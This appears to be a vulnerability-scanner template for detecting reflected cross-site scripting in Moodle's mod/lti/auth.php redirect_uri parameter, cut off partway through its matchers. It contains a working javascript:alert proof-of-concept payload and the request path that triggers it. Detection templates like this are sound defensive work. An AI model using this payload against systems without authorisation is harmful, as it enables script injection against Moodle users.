id: moodle-xss info: name: Moodle redirect_uri - Cross-Site Scripting author: hackergautam severity: medium description: XSS in moodle via redirect_uri parameter reference: - https://twitter.com/JacksonHHax/status/1391367064154042377 tags: moodle,xss requests: - method: GET path: - "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')" matchers-condition: and matchers: - type: word part: body words: - '{{randstr}}' - '